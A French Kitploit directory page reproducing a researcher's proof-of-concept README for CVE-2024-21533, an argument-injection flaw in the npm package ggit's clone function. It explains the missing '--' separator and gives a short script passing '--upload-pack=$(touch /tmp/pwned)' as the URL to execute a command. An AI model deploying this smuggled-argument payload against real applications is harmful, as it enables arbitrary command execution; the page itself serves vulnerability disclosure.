Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-21533-PoC-ggit — CVE-2024-21533 PoC ggit | Kitploit
Outils/GitHubGitHub/lirantal/cve-2024-21533-poc-ggit
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebSécurité de la Chaîne Logistique
GitHublirantal/cve-2024-21533-poc-ggit

CVE-2024-21533-PoC-ggit

CVE-2024-21533 PoC ggit

Voir le dépôt
il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Vulnérabilité d'injection d'arguments CVE-2024-21533 dans ggit

ggit se décrit comme suit :

root@kitploit:~
Local promise-returning git command wrappers

Ressources :

  • Code source GitHub du projet : https://github.com/bahmutov/ggit
  • Paquet npm du projet : https://www.npmjs.com/package/ggit

Article détaillé sur cette vulnérabilité d'injection d'arguments : https://nodejs-security.com/blog/flawed-git-promises-library-on-npm-leads-to-command-injection-vulnerability

Contexte de l'exploitation

Je signale une vulnérabilité d'injection d'arguments dans le paquet npm ggit.

Cette vulnérabilité se manifeste avec l'API clone() de la bibliothèque, qui permet de spécifier l'URL distante à cloner et le fichier sur disque vers lequel cloner. Cependant, la bibliothèque ne neutralise pas les entrées utilisateur ni ne valide un schéma d'URL donné, et elle ne transmet pas correctement les options de ligne de commande au binaire git en utilisant les caractères POSIX à double tiret (--) pour indiquer la fin des options.

Ainsi, permettant aux utilisateurs d'exploiter une vulnérabilité d'injection d'arguments dans Git en raison de l'option de ligne de commande --upload-pack qui entraîne l'exécution de commandes arbitraires. (outPath) pour cloner vers celui-ci, la vulnérabilité s'applique.

Exploitation

  1. Installez [email protected] ou une version antérieure
  2. Établissez le POC suivant :
root@kitploit:~
const clone = require("ggit").cloneRepo;
clone({
  url: "--upload-pack=$(touch /tmp/pwned)",
  folder: "/tmp/dbd",
}).then(function () {
  console.log("cloned repo to destination folder");
});
  1. Observez le nouveau fichier créé sur disque à l'emplacement /tmp/pwned

Contribution

Veuillez consulter CONTRIBUTING pour les directives relatives à la contribution à ce projet.

Auteur

Liran Tal

Télécharger l’outil